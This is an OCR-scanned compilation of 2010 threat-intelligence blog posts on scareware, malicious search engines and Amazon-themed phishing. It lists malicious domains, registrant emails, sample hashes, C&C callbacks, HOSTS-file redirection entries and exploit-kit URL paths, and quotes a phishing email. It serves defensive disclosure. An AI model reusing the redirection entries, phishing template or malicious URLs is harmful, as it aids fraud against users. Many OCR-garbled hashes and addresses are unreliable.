iatuo.in - Email: erofeevalexey77@gmail.com 
leunv.in - Email: SimakovSergey@mail.com 
linuo.in - Email: erofeevalexey77@gmail.com 
iiuyx.in - Email: NikitasZoya@mail.com 
m a key. in - Email: ZaharcevSergey@mail.com 
moosd.in - Email: VasilevaSvetlana@mail.com 
naios.in - Email: Hohlunovanika@live.com 
nvenc.in - Email: BajenovOleg@mail.com 



oscog.in - Email: Nigmatovaanastasia@hotmail.com 
osenc.in - Email: Nigmatovaanastasia@hotmail.com 
oserr.in - Email: skripnikkseniya@iive.com 
osmac.in - Email: skripnikkseniya@live.com 
osmot.in - Email: skripnikkseniya@iive.com 
ospor.in - Email: skripnikkseniya@live.com 
ossce.in - Email: skripnikkseniya@live.com 
ossio.in - Email: skripnikkseniya@live.com 
ostab.in - Email: skripnikkseniya@live.com 
ostac.in - Email: skripnikkseniya@live.com 
ostio.in - Email: skripnikkseniya@live.com 
ostom.in - Email: skripnikkseniya@live.com 
ouned.in - Email: PoleschukovaGalina@mail.com 
purnv.in - Email: BajenovOleg@mail.com 
pxdmx.in - Email: GaleevDjamil@mail.com 
ragew.in - Email: vednerovasvetlana@gmail.com 
re key. in - Email: ZaharcevSergey@mail.com 
relsd.in - Email: VasilevaSvetlana@mail.com 
retnv.in - Email: BajenovOleg@mail.com 
saled.in - Email: VasilevOleg@mail.com 



sated.in - Email: VasilevOleg@mail.com 
scoos.in - Email: Nigmatovaanastasia@hotmail.com 
sdali.in - Email: Vasileva5vetlana@mail.com 
sdall.in - Email: VasilevaSvetlana@mail.com 
sdayb.in - Email: OsvyanikovaDarya@mail.com 
sdaye.in - Email: OsvyanikovaDarya@mail.com 
sdayo.in - Email: OsvyanikovaDarya@mail.com 
sdene.in - Email: OsvyanikovaDarya@mail.com 
sdich.in - Email: OsvyanikovaDarya@mail.com 
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sdome.in - Email: OsvyanikovaDarya@mail.com 
seedw.in - Email: vednerovasvetlana@gmail.com 
shkey.in - Email: FirulevAndrey@mail.com 
smoed.in - Email: VasilevOleg@mail.com 
soted.in - Email: VasilevOleg@mail.com 
spios.in - Email: Nigmatovaanastasia@hotmail.com 
spkey.in - Email: FirulevAndrey@mail.com 
stteop.in - Email: fibra _appl@yahoo.com 
sunyx.in - Email: GaevAlexandr@mail.com 
sydos.in - Email: Nigmatovaanastasia@hotmail.com 



teaed.in - Email: VasilevOleg@mail.com 
thynv.in - Email: BajenovOleg@mail.com 
ugiyx.in - Email: GaevAlexandr@mail.com 
uinei.in - Email: UshakovAndrey@mail.com 
uinge.in - Email: UshakovAndrey@mail.com 
uiren.in - Email: UshakovAndrey@mail.com 
uirin.in - Email: UshakovAndrey@mail.com 
uisap.in - Email: UshakovAndrey@mail.com 
uisee.in - Email: UshakovAndrey@mail.com 
uisma.in - Email: lvanovEvgeny@mail.com 
uitem.in - Email: lvanovEvgeny@mail.com 
uithi.in - Email: lvanovEvgeny@mail.com 
uityp.in - Email: lvanovEvgeny@mail.com 
uityr.in - Email: lvanovEvgeny@mail.com 
varyx.in - Email: GaevAlexandr@mail.com 
veged.in - Email: VasilevOleg@mail.com 
wakey.in - Email: FirulevAndrey@mail.com 
whasd.in - Email: VasilevaSvetlana@mail.com 
wimed.in - Email: VasilevOleg@mail.com 
woonv.in - Email: BajenovOleg@mail.com 



yokey.in - Email: FirulevAndrey@mail.com 
yxiac.in - Email: GaevAlexandr@mail.com 
yxial.in - Email: GaevAlexandr@mail.com 
yxiam.in - Email: GaevAlexandr@mail.com 



Parked at/responding to 91.188.60.3 are: 

Ocheckingyourtraffic.com - Email: 
FranciscoPGeorge@hotmail. com 

10checkingyourtraffic.com - Email: 
FranciscoPGeorge@hotmail. com 

20checkingyourtraffic.com - Email: 
FranciscoPGeorge@hotmail. com 

30checkingyourtraffic.com - Email: 
FranciscoPGeorge@hotmail. com 

40checkingyourtraffic.com - Email: 
FranciscoPGeorge@hotmail. com 

50checkingyourtraffic.com - Email: 
FranciscoPGeorge@hotmail. com 

60checkingyourtraffic.com - Email: 
FranciscoPGeorge@hotmail. com 

70checkingyourtraffic.com - Email: 
FranciscoPGeorge@hotmail. com 

80checkingyourtraffic.com - Email: 
FranciscoPGeorge@hotmaii. com 

90checkingyourtraffic.com - Email: 
FranciscoPGeorge@hotmail. com 

av-scaner-onlinemachine.com - Email: 
gershatv07@gmaii.com 

easy-ns-server.org - Email: russelll985@hotmail.com 
fast-scanerr-online.org - Email: roberson@hotmail.com 



fast-scanneronline.org - Email: roberson@hotmail.com 
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fastscanner-online.org - Email: roberson@hotmaii.com 

fastscannerr-online.org - Email: roberson@hotmail.com 

myantivirspius.org - Email: 

FranciscoPGeorge@hotmaii. com 

my-antivirspius.org - Email: 

FranciscoPGeorge@hotmaii. com 

my-antiviruspius.org - Email: 
FranciscoPGeorge@hotmail. com 

my-antivirus-pius.org - Email: 
FranciscoPGeorge@hotmail. com 

myprotectonline.org - Email: 
FranciscoPGeorge@hotmail. com 

my-protectoniine.org - Email: 
FranciscoPGeorge@hotmail. com 

my-protect-oniine.org - Email: 
FranciscoPGeorge@hotmail. com 

sysprotectoniine.org - Email: 
FranciscoPGeorge@hotmail. com 

sys-protectoniine.org - Email: 
FranciscoPGeorge@hotmail. com 

sys-protect-online.org - Email: 
FranciscoPGeorge@hotmail. com 


Parked at/responding to 91.188.59.74 are: 
allforilli.com - Email: lordjok@gmail.com 
alltubeforfree.com - Email: lordjok@gmail.com 
aiixtubevids.net - Email: lordjok@gmail.com 
downloadfree now. in - Email: lordjok@gmail.com 
enterilllisec.in - Email: leshapopovi@gmail.com 
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freeanaisextubemovies.com - Email: lordjok@gmail.com 
freetube06.com - Email: lordjok@gmail.com 
freeviewgogo.com - Email: leshapopovi@gmail.com 
homeamateurclips.com - Email: lordjok@gmail.com 
hot4youxxx.in - Email: lordjok@gmail.com 
hotxtube.in - Email: lordjok@gmail.com 
hotxxxtube video, com 
iillOoilO.com 
ilio01ilil.com 

illinolill.in - Email: lordjok@gmail.com 
porntube2000.com - Email: welolseeees@gmail.com 
porntubefast.com - Email: welolseeees@gmail.com 


porn-tube-video.com - Email: welolseeees@gmail.com 
viewnowfast.com - Email: lordjok@gmail.com 
viewxxxfreegall.net - Email: ieshapopovi@gmaii.com 

viiistiforl. com 

xhuilillii.com - Email: lordjok@gmail.com 
youvideoxxx.com - Email: jonnytrade@gmaii.com 
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Parked at/responding to 85.234.190.16 are: 
appsd.in - Email: lvanovEvgeny@mail.com 
bikey.in - Email: lvanovEvgeny@mail.com 
fibnv.in - Email: 5imakov5ergey@mail.com 
franv.in - Email: SimakovSergey@mail.com 
guinv.in - Email: 5imakov5ergey@mail.com 
he key. in - Email: Zaharcev5ergey@maii.com 
intsd.in - Email: LomaevaTatyana@mail.com 
ionnv.in - Email: Simakov5ergey@mail.com 
jamsd.in - Email: LomaevaTatyana@mail.com 
leunv.in - Email: SimakovSergey@mail.com 
nvenc.in - Email: BajenovOleg@mail.com 
pxdmx.in - Email: GaleevDjamil@mail.com 



uinei.in - Email: GaleevDjamil@mail.com 
uinge.in - Email: UshakovAndrey@mail.com 
uiren.in - Email: UshakovAndrey@mail.com 
uirin.in - Email: UshakovAndrey@mail.com 
uisap.in - Email: UshakovAndrey@mail.com 
uisee.in - Email: UshakovAndrey@mail.com 
woonv.in - Email: BajenovOleg@mail.com 
yxiam.in - Email: GaevAlexandr@mail.com 
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Detection rates for the currently active malware samples, 
including the HOSTS file modifications on infected hosts, for 
the purposely of redirecting users to [7]cybercrime- 
friendly search engines, monetized through traffic 
trading affiliate programs. 

- [8]78490.jar - Result: 0/42 (0 %) 

File size: 209 bytes 

MD5 : 64al9d9b7f0e81c7a5f6d63853a3ed49 

SHA1 : 9f8f208c8cdb854cdc342d43a75a3d8672e87822 

- [9jad3.exe 

[10] - Result: 41/42 (97.62 %) 

File size: 2560 bytes 


MD5...: 9362a3aee38102dde68211 ccb63c3e07 
SHA1..: 8758679540f48feba82d2b022b8d71756eb935e7 

- [llja-fast.exe - Result: 36/42 (85.72 %) 

File size: 979968 bytes 

MD5...: 69f3949141073679b77aa4d34e41 a3e7 

SHA1..: eO74de46e4760eef522ab85737790058cc3f2fad 
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- [12Jdm.exe - Result: 37/42 (88.1 %) 

File size: 83968 bytes 

MD5...: b658d9b812454e99b2915ab2e9594b94 
5HA1..: 134bfb643ae2fl 61 c99dbl 4c448485e261 e96c91 

- [13Jiv.exe - Result: 8/42 (19.05 %) 

File size: 86016 bytes 

MD5...: f94ed2f9d7a672fe3ff8bf077289b2d5 

SHA1..: 2f78a296el267aelcf9ebd5cl8de5b8d24Id306 

- [14]j2 _ t895.jar - Result: 0/42 (0 %) 

File size: 211 bytes 

MD5...: 4b34618a0499a99e9c98e03aa 79d53cf 

SHA1..: dl 09babf78ec48ba8d7798bee784097ed26757db 

- [15Jmovie.exe - Result: 40/42 (95.24 %) 



File size: 64866 bytes 

MD5...: 801 f9fa958192b6714a5a4c2e2f92f07 

5HA1..: 241bc9d7540d9d53ccl578e3d57c44be9931 e418 

- [16Jtst.exe - Result: 35/42 (83.34 %) 

File size: 356352 bytes 

MD5...: b0ed4701afl3fl 1089de850al273d24f 

SHA1..: 5e98000b60d0ca0b2adbd837feaf05f439f95c87 

- [17Jwsc.exe - Result: 37/42 (88.1 %) 

File size: 24576 bytes 

MD5...: 80427b 754bl 1 de653758dd5el ba3del c 

SHA1..: 554el331 fdc050bd603f6f3628285008a91 cba37 

HOSTS file modification: 

AS28753, NETDIRECT AS NETDIRECT Frankfurt, DE 

89.149.210.109 www.google.com 

89.149.210.109 www.google.de 

89.149.210.109 www.google.fr 

89.149.210.109 www.google.co.uk 

89.149.210.109 www.google.com.br 

89.149.210.109 www.google.it 

89.149.210.109 www.google.es 



89.149.210.109 www.google.co.jp 

89.149.210.109 www.google.com.mx 

89.149.210.109 www.google.ca 

89.149.210.109 www.google.com.au 

89.149.210.109 www.google.nl 

89.149.210.109 www.google.co.za 

89.149.210.109 www.google.be 

89.149.210.109 www.google.gr 

89.149.210.109 www.google.at 

89.149.210.109 www.google.se 

89.149.210.109 www.google.ch 

89.149.210.109 www.google.pt 
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89.149.210.109 www.google.dk 

89.149.210.109 www.google.fi 

89.149.210.109 www.google.ie 

89.149.210.109 www.google.no 

89.149.210.109 search.yahoo, com 

89.149.210.109 us.search.yahoo, com 

89.149.210.109 uk. search.yahoo, com 



- [18jrc.exe - Result: 41/42 (97.62 %) 

File size: 2560 bytes 

MD5...: 9362a3aee38102dde68211 ccb63c3e07 
SHA1..: 8758679540f48feba82d2b022b8d71756eb935e7 

HOSTS file modification: 

AS28753, NETDIRECT AS NETDIRECT Frankfurt, DE 

89.149.249.196 www.google.com 

89.149.249.196 www.google.de 

89.149.249.196 www.google.fr 

89.149.249.196 www.google.co.uk 

89.149.249.196 www.google.com.br 

89.149.249.196 www.google.it 

89.149.249.196 www.google.es 

89.149.249.196 www.google.co.jp 

89.149.249.196 www.google.com.mx 

89.149.249.196 www.google.ca 

89.149.249.196 www.google.com.au 

89.149.249.196 www.google.nl 

89.149.249.196 www.google.co.za 

89.149.249.196 www.google.be 



89.149.249.196 www.google.gr 

89.149.249.196 www.google.at 

89.149.249.196 www.google.se 

89.149.249.196 www.google.ch 

89.149.249.196 www.google.pt 

89.149.249.196 www.google.dk 

89.149.249.196 www.google.fi 

89.149.249.196 www.google.ie 

89.149.249.196 www.google.no 

89.149.249.196 www.google.co.in 

89.149.249.196 search.yahoo.com 

89.149.249.196 us.search.yahoo, com 

89.149.249.196 uk.search.yahoo, com 
- [19Jinstaiier.0028.exe - Result: 9/42 (21.43 %) 

File size: 43735 bytes 

MD5...: a6d7073b8b9bc0dc539605914c853da2 
SHA1..: 1940b6a6b2f93b44633ef04eab900e0a9dc6fa64 

HOSTS file modification: 

AS28753, NETDIRECT AS NETDIRECT Frankfurt, DE 
84.16.244.60 www.google.com 



84.16.244.60 us.search.yahoo.com 
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84.16.244.60 uk.search.yahoo.com 

84.16.244.60 search.yahoo.com 

84.16.244.60 www.google.com.br 

84.16.244.60 www.google.it 

84.16.244.60 www.google.es 

84.16.244.60 www.google.co.jp 

84.16.244.60 www.google.com.mx 

84.16.244.60 www.google.ca 

84.16.244.60 www.google.com.au 

84.16.244.60 www.google.nl 

84.16.244.60 www.googie.co.za 

84.16.244.60 www.google.be 

84.16.244.60 www.googie.gr 

84.16.244.60 www.google.at 

84.16.244.60 www.google.se 

84.16.244.60 www.google.ch 

84.16.244.60 www.google.pt 

84.16.244.60 www.google.dk 



84.16.244.60 www.google.fi 

84.16.244.60 www.google.ie 

84.16.244.60 www.google.no 

84.16.244.60 www.google.de 

84.16.244.60 www.google.fr 

84.16.244.60 www.google.co.uk 

84.16.244.60 www.bing.com 

- [20Jinstaller.0022.exe - Result: 9/42 (21.43 %) 

File size: 43731 bytes 

MD5...: 62464b9e367a9edb06541a2a90931157 
SHA1..: 425c859a883900ccf5cf7b8a6a5f6bc9279d763c 

HOSTS file modification: 

AS28753, NETDIRECT AS NETDIRECT Frankfurt, DE 

84.16.244.15 www.google.com 

84.16.244.15 us.search.yahoo.com 

84.16.244.15 uk.search.yahoo.com 

84.16.244.15 search.yahoo.com 

84.16.244.15 www.google.com.br 

84.16.244.15 www.google.it 

84.16.244.15 www.google.es 



84.16.244.15 www.google.co.jp 

84.16.244.15 www.google.com.mx 

84.16.244.15 www.google.ca 

84.16.244.15 www.google.com.au 

84.16.244.15 www.google.nl 

84.16.244.15 www.google.co.za 

84.16.244.15 www.google.be 

84.16.244.15 www.google.gr 

84.16.244.15 www.google.at 

84.16.244.15 www.google.se 

84.16.244.15 www.google.ch 
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84.16.244.15 www.google.pt 



84.16.244.15 www.google.dk 

84.16.244.15 www.google.fi 

84.16.244.15 www.google.ie 

84.16.244.15 www.google.no 

84.16.244.15 www.google.de 

84.16.244.15 www.google.fr 

84.16.244.15 www.googie.co.uk 

84.16.244.15 www.bing.com 

The payment gateway structure+related domains for the 
sea re ware campaigns: 

- fast-payments.com/index.php?prodid=antus 02 01 
&afid= - 91.188.59.27 - Email: jciarke980@gmaii.com 

- nsl.fastsecurebilling.com - 91.188.59.26 - Email: 
jclarke980@gmail. com 

- easypayments-oniine.com - 91.188.59.28 - Email: 
jclarke980@gmail. com 

- fast-payments.com - 91.188.59.27 - Email: 
jclarke980@gmail. com 

- billingonline.net - 91.188.59.29 - Email: 
ke vbush@billingonline. net 

- biiisoiutions.net - 91.188.59.25 

In respect to the IPs used in HOSTS file modification, one is 
of particular interest - 89.149.210.109, as it was first 



profiled in November, 2009's "[21]Koobface Botnet's 
Scareware Business Model - Part Two" with MD5: 

Ofbfla9f8e6e305138151440da58b4fl modifying HOSTS 
file using the same IP, and also phoning back to the 

Koobface gang's 1.0 hardcore C &C - 

urodinam.net/8732489273.php 

When it comes to cybercrime, there's no such thing as a 
coincidence. What's static is the [22]interaction between 
the usual suspects, systematically switching hosting 
providers, introducing new domains, and [23]conveniently 
denying their monetization tactics. 

You wish. 

Profiled AS6851, BKCNET/Sagade Ltd. activity: 

[24] GoDaddy's Mass Word Press Blogs Compromise Serving 
Scareware 

[25] Dissecting the Mass Dream Host Sites Compromise 

[26] Spamvertised iTunes Gift Certificates and CV Themed 
Malware Campaigns 

[27] Dissecting the 100,000+ Scareware Serving Fake 
YouTube Pages Campaign 

[28] Facebook Photo Album Themed Malware Campaign, 
Mass SQL Injection Attacks Courtesy of AS42560 

This post has been reproduced from [29]Dancho 
Danchev's blog. Follow him [30]on Twitter. 

1. httD://cidr-reDort.or a/c ai-bin/as-reDort?as=AS6851 






2. htto.V/ddanchev.blo as oot.com/2010/05/dissectino-mass- 
dreamhost-sites.html 

3. httDs://zeustracker.abuse, ch/monitor. oh o?as=6851 
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Sampling Malicious Activity Inside Cybercrime- 
Friendly Search Engines (2010-07-15 17:44) 

UPDATED, Friday, July 16, 2010 - Directi has suspended 
the domains portfolio of the cybercrime-friendly search 
engines. 

[ 1 JCybercrime-friendly search engines are bogus 
search engines, which in between visually social 
engineering their users, offer fake results leading to client- 
side exploits, bogus video players dropping more malware, 
sea re ware, next to the pharmaceutical scams, and domain 
farms neatly embedded with Google AdSense scripts for 
monetization. 

In the majority of cases - whenever blackhat 5E0 is not an 
option - end users are exposed the their maliciousness once 
they get infected with malware redirecting each and every 
request to popular search engines such as Google, 

Yahoo and Bing to the malicious IPs/domains operated by 
the cybercriminals. 













As far as their monetization tactics are concerned, fellow 
cybercriminals are free to purchase any kind of key¬ 
word they want to, for instance "spyware", make it look like 
the end user is clicking on security-vendor.corn's site, 560 
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whereas upon clicking, based on his physical location a 
particular type of malicious activity takes place. 

Remember the HOSTS file modification taking place 
courtesy of the malware at [2JAS6851, BKCNET, Sagade 

Ltd. , and in particular the [3]Koobface gang related IP 
89.149.210.109? Sampling the malicious activity within 
the search engines parked/forwarded (DNS recursion) from 
this IP, results in client-side exploits, bogus video players 
dropping malware, and sea re ware, and that in less than 5 
minutes of testing. 

The cybercrime-friendly domains in question: 

searchclickl.com - Email: d.bond@mail.ru - 

78.159.112.46 - AS28753 

searchclick2.com - Email: d.bond@mail.ru - 

78.159.112.46 - AS28753 

searchclick3.com - Email: d.bond@mail.ru - 

78.159.112.46 - AS28753 

searchclick4.com - Email: d.bond@mail.ru - 

78.159.112.46 - AS28753 

searchclick5.com - Email: d.bond@mail.ru - 

78.159.112.46 - AS28753 


searchclick6.com - Email: d.bond@maii.ru - 

78.159.112.46 - AS28753 

searchclick7.com - Email: d.bond@mail.ru - 

78.159.112.46 - A528753 

searchclick8.com - Email: d.bond@mail.ru - 

78.159.112.46 - A528753 

searchciick9.com - Email: d.bond@mail.ru - 

78.159.112.46 - A528753 

searchciicklO.com - Email: d.bond@mail.ru - 

78.159.112.46 - A528753 

searchmeup4.com - 78.159.112.46 - AS28753 
zetaclicks4.com - 78.159.112.46 - A528753 
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websafeciicks.com - Email: d.bond@mail.ru - 

78.159.112.46 - A528753 

internal redirections reading to malicious take place 
through the following domains: 

7search.com - 12.171.94.40 - Email: 
webadmin@7search.com 

greatseeking.com, superfindmea.info - 213.174.154.9 - 
Email: serduko v. art@gmail. com 

superseeking.org - 213.174.154.9 - Email: 
serduko v. art@gmail. com 


searching4all.com, pharmc9.com - 66.230.188.68 - 
Email: abuse@click9.com 

syssmessage.com; sysstem-mesage.com; sys- 
mesage.com; potectmesage.com - 91.188.59.62 - Email: 
roroalek-sey@gmail. com 

xml.click9.com/click.php - 66.230.188.67 - Email: 
abuse@click9. com 

sunday-traffic.com/in.php - 74.52.216.46 - Email: 
tech@add-manager. com 

efindsite.info/search2.php - 74.52.216.46 

greatseeking.com/search2.php - 213.174.154.9 - Email: 
serduko v. art@gmail. com 

n-traff.com/ciickn.php - 64.111.208.39 

going-to-n.com/ciickn.php - 64.111.208.38 

e verytds. tk/in. cgi?3= &ID=19504; only scan, tk; 
pornstaar.tk; dotroot.tk - 94.100.31.26 

Internal pharmaceutical redirections take place through the 
following domains: 

medsbrands.com - 74.52.216.46 - Email: tech@add- 
manager.com 

thepillsdiscounts.info - 74.52.216.46 - Email: tech@add- 
manager.com 

yourcatalogonline.biz - 74.52.216.46 
bestderden.org - 74.52.216.46 



Internal redirections reading to malicious take place through 
the following IPs: 

199.80.55.19/go.php ?da ta= 

199.80.55.80/go.php ?da ta= 

78.140.141.18/kkk.php 

78.140.143.83/go. php 

64.111.212.234/c.php 

64.111.196.126/c.php 

66.230.188.67 

68.169.92.61/c.php 

68.169.92.60/c.php 

68.169.93.242/c. php 

68.169.92.55/c.php 
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Sample malicious activity consists of sea re ware 
campaigns, client-side exploits, and bogus video 
players dropping malware. 

Upon visiting the bogus PornTube at vogel- 
tube.com/xfreeporn.php?id= - 66.197.187.118 (the- 
rea I-tu be¬ 
hest, com great-celebs-tube.net parked there) - Email: 
admin@thenweb.com the use is tricked into manu- 


ally installing basemultimedia.com/video~ 
plugin.45309.exe - 66.197.154.21 
(visuaibasismedia.com) - Email: joe@silentringer.com 

- Detection rate 

[4jvideo-plugin.45309.exe - Downloader-CEW.b, Result: 
6/42 (14.29 %) 

File size: 113152 bytes 

MD5...: 25e644171bf9ee2a052b5fa71f8284e5 

SHA1..: e4ac01534c7c 1 b71 d2a38cf480339d31 dbl87ecb 

Upon execution, the sample phones back to: 

best-arts-2010.com - 216.240.146.119 - Email: 

hello-arts.com - 64.191.44.73 - Email: 

youngfinearts.com - 64.20.35.3 - Email: 

newchannelarts.com - 64.191.64.105 - Email: 

vrera.com/oms.php - 208.43.125.180 - Email: 

allxt.com/borders.php - 64.191.82.25 

Parked at 216.240.146.119, AS7796 are also: 

best-arts-2010.com - Email: aurora@seekrevenue.com 

crystaldesignlab.com - Email: 
tamara. watson@chemist.com 

homegraphicarts.com - Email: elizabethj@theplate.com 



mediaartsplaza.com - Email: darhom@lendingears.com 

morefinearts.net - Email: vdickerson37@yahoo.com 

photoartsworld.com - Email: margaret 
_adams@rocketmail. com 

pinehousearts.com - Email: jgaron@physicist.net 
sunnyartsite.com - Email: jbowker@blader.com 
thefanarts.com - Email: keasler@surferdude.com 
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waycooiart.com - Email: blynch@net-shopping.com 
woodsmayart.com - Email: raymo@songwriter.net 
garner.funtaff.com - Email: dph@greentooth.net 
Parked at 64.191.44.73, AS21788 are also: 
auctionhouseart.com - Email: emerynancy@ymail.com 
bestmalearts.com - Email: mcfarlin@religions.com 
coolcatart.com - Email: pbiron@catlover.com 
freesurrealarts.com - Email: ghuertas@rocketmail.com 
goldfireart.com - Email: thysell@gardener.com 
greatmovieart.com - Email: linger@theplate.com 
worldartsguide.com - Email: ghagen@allergist.com 


install.netwaq.com - Email: 
admin@overseedomainmanagement.com 

Parked at 64.20.35.3, AS 19318 are also: 

artscontact.net - Email: mschneider@doctor.com 

catbodyart.com - Email: pbiron@catlover.com 

feearts.com - Email: breckenridge56@hotmail.com 

freeflasharts.com - Email: russell@clubmember.org 

gardendesignart.com - Email: jasona@gardener.com 

greatfiashstudies.com - Email: jdeal@worshipper.com 

superiegoarts.com - Email: jdeal@worshipper.com 

thedigitalarts.com - Email: hoffman@theaterpillow.com 

virginmegaart.com - Email: hoffman@theaterpillow.com 
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Related malicious domains sharing the same DNS 
infrastructure: 

iransatne ws. org 

best-arts-2010.com - Email: aurora@seekrevenue.com 
mediasite2010.com - Email: webmaster@pullstraws.com 
setiamedia.com - Email: monro@eclipsetool.com 
doubiesetmedia.com - Email: monro@eclipsetool.com 


thetestmedia.com - Email: webmaster@maidnews.com 

trinitytestmedia.com - Email: 
webmaster@maidne ws. com 

i-metodika.com - Email: facovskiy _ _n _ 

_1977@ ram bier, ru 

iffic.com 

moviefactinc.com - Email: usa@crystais.com 
newdataltd.com - Email: wenzel@techie.com 
new-2010-tube.com - Email: fortney@petlover.com 
super-world-tube.com - Email: fortney@petiover.com 
real-good-tube.com - Email: fortney@petlover.com 
green-real-tube.com - Email: sanctim59@yahoo.com 
sensual-tube.com - Email: sanctim59@yahoo.com 
webfiimoffice.com - Email: pam@skunkalert.com 
xxl-tube-home. com 
nowsearchonline.com 

localmediasearch.com - Email: mega@stockdvds.com 
mediaonsearch.com - Email: mega@stockdvds.com 
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mesghal.com - Email: shahnamgolshany@yahoo.com 


niptoon.com 

mydvdinfo.com - Email: usa@crystals.com 

receptionist-pro. com 
hitinto.com 

importedfoodscorp.com - Email: 
apompeo@importedfoodscorp. com 

newhavenfiles.com - Email: wenzel@techie.com 

waiterwagnerassociates, com 

excellentutilites.com - Email: wentexkino@ymaii.com 

pengs.com 

livingwithdragons.com - Email: gregory@lamerton.ltd.uk 

amigroups. com 
iransatne ws. com 

dvddatadirect.com - Email: friese@toke.com 

itlist.com - Email: support@gossimer.biz 

gossimer.net - Email: support@gossimer.biz 

Following the bogus dropper, the cybercriminals are also 
directly serving client-side exploits to users seeking for 
security related content. In this case, the exploits/malware 
are served from xoxipemej.cn/gr/sl/ -178.63.170.185 - 

Email: shiwei__fang77@126.com. 



- Detection rate: 


[5J.exe - Rootkit.Agent.AJDR, Result: 20/42 (47.62 %) 

File size: 53760 bytes 

MD5...: 23244c5b5b02fab65b3a 7ab51005fd51 

5HA1..: a5flal0344378f2c8fl3c266dce39247ba3bae5f 
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Parked on the same IP 178.63.170.185, A524940 are also: 

2011traff.com - Email: MillieDiaz4@aol.com 

2011-traff.com - Email: MillieDiaz4@aol.com 

bbbinvestigation.org - Email: accounting@moniker.com 

best-sofa-choice.com - Email: migray71@yahoo.com 

celloffer-2015.com - Email: migray71@yahoo.com 

flying-city-2011.com - Email: migray71@yahoo.com 

jiujitsufgua.com - Email: varcraft@care2.com 

jopaduloz.cn - Email: qing _hongwei@126.com 

iokexawan.cn - Email: shiwei_fang77@126.com 

mapozeloq.cn - Email: shiwei_fang77@126.com 

melonirmonianmonia.com - Email: 
accounting@moniker. com 


mivaqodaz.cn - Email: shiwei_fang77@126.com 
nasnedofweiggyt.com - Email: roller_59@hotmail.com 
redolopip.cn - Email: shiwei_fang77@126.com 
redspot2010.com - Email: migray71@yahoo.com 
rohudufoj.cn - Email: qing _hongwei@126.com 
sujeiodos.cn - Email: qing _hongwei@126.com 
traff2011.com - Email: MillieDiaz4@aol.com 
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traff-2012.com - Email: MillieDiaz4@aol.com 

uweyujem.com - Email: resumemolars@live.com 

viwuvefot.cn - Email: shiwei_fang77@126.com 

wkeuhryyejt.com - Email: excins@iname.com 

xoxipemej.cn - Email: shiwei_fang77@126.com 

Last, but not least is the sea re ware infection taking place 
through wwwl.warezforyou24.co.cc/?p=p52 - 

114.207.244.146; 114.207.244.143; 114.207.244.144; 
114.207.244.145. Parked on these IPs is also an exten¬ 
sive portfolio of related sea re ware domains. 

- Detection rate: 

[6]packupdatel07_231.exe - 

Suspicious: W32/Malware!Gemini, Result: 3/42 (7.15 %) 



File size: 238080 bytes 

MD5...: 93517875c59ac33dab655bc8432b0724 

SHA1..: 774af049406baeef3427b91 a2d67ee0250b2b51 b 

Upon execution the sample phones back to: 

update2.cleanupyoursoft.com - 209.222.8.101 - Email: 
gkook@checkjemaU. nl 

updatel.soft-cleaner.com - 95.169.186.25 - Email: 
gkook@checkjemaU. nl 

securel.smartavz.com - 91.207.192.26 - Email: 
gkook@checkjemail. nl 

report.mygoodguardian.com - 93.186.124.94 - Email: 
gkook@checkjemail. nl 

www5.securitymasterav.com - 91.207.192.25 - Email: 
gkook@checkjemail. nl 

update2.soft-cleaner.net - 209.222.8.100 - Email: 
gkook@checkjemaU. nl 

report.mytrueguardian.net - 79.171.23.150 - Email: 
gkook@checkjemail. nl 

secure2.smartavz.net - 217.23.5.99 - Email: 
gkook@checkjemaU. nl 

updatel.free-guard.com - Email: gkook@checkjemail.nl 

report.mygoodguardian.com - 93.186.124.94 - Email: 
gkook@checkjemail. nl 



updatel.soft-cleaner.com - 95.169.186.25 - Email: 
gkook@checkjemaii. nl 

www5.securitymasterav.com - 91.207.192.25 - Email: 
gkook@checkjemaii. nl 

update2.soft-cleaner.net - 209.222.8.100 - Email: 
gkook@checkjemaii. nl 

report.mytrueguardian.net - 79.171.23.150 - Email: 
gkook@checkjemaii. nl 

The cybercrime-friendly domains portfolio is in a process of 
getting suspended. 

This post has been reproduced from [7]Dancho 
Danchev's blog. Follow him [8]on Twitter. 

1. httD.V/www.zdnet.com/bloa/securit v/c vbercriminals- 
oromotina-malwa re-friendlv-search-enaines/3333 

2. htto://ddanchev.blo as oot.com/2010/07/exploits-maiware- 
and-scare ware-courtesv. html 

3. htto.V/ddanchev.blo as oot.com/2009/11/koobface-botnets- 
scareware-business. html 

4. 

htto://www. virustotai. com/analisis/4ela45a89acf575le 7dcf 

a 1 dcbc9b68de0b44de6988fe2902851 ad 51 cfc93d4 7-12 791 

97428 

5. 

htto://www. virustotal.com/analisis/0b9618dd8173dd69df8el 

76e49elaa01f2c5fe06fcb46980d06dbed6a95eba45-12791 






















97422 


6 . 

http://www. virustotal. com/analisis/1 a58543dfd5a5777cael c 

29c6f994ad5al012c2adbah&abe420527f7el2dc4c2-12791 

97438 

7. http://ddanchev.blo as pot. com/ 

8. http://twitter.com/danchodanchev 
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Spamvertised Amazon "Verify Your Email", "Your 
Amazon Order" Malicious Emails (2010-07-16 21:17) 

And they're back (Gumblar or RUmblar due to the extensive 
use of .ru domains) for a decent start of the weekend - 

switching social engineering themes one more time, this 
time impersonating Amazon.com 

• NOTE: A summary of the malicious payload served will be 
posted at a later stage. Meanwhile, in order to 

facilitate quicker response, a complete list of the domains 
participating will be featured/disseminated across 

the appropriate parties. 

- Sample subject: Amazon.com: Please verify your new e- 
mail address 

- Sample message: " Dear email, You recently changed 
your e-mail address at Amazon.com. Since you are a 









subscriber of Amazon.com Delivers E-mail Subscriptions, 
you will need to verify your new e-mail address. Please 
verify that the e-mail address email belongs to you. You can 
dick on the link below to complete the verification process. 
Alternatively, you can type or paste the following link into 
your Web browser: http://www.amazon.com" 
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Client-side exploitation is taking place through, for instance, 

crystalrobe.ru: 

8080/index.php?pid=14 and 

hillchart.com: 8080/index.php?pid=14. As seen in 
previous campaigns, this one is also sharing an identical 
directory structure, such as: 

malicious-domain.com :8080/index.php?pid=2 

malicious-domain.com :8080/Notesl.pdf (Notes 1-to- 
Notesl0.pdf) 

malicious-domain.com :8080/Ne wCames.jar 

malicious-domain.com :8080/Cames.jar 

malicious-domain.com :8080/Appletl.html (Applet 1- 
to-Appletl O.html) 

malicious-domain.com :8080/weicome.php?id=6 
&pid=l &hello=503 

crystairobe.ru :8080/index.php?pid=14 

crystalrobe.ru :8080/jquery.jxx?v=5.3.4 


crystalrobe.ru :8080/new/controller.php 
crystalrobe.ru :8080/js.php 
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crystalrobe.ru :8080/welcome.php?id=6 &pid=l 
&hello=503 

crystalrobe.ru :8080/welcome.php?id=0 &pid=l 

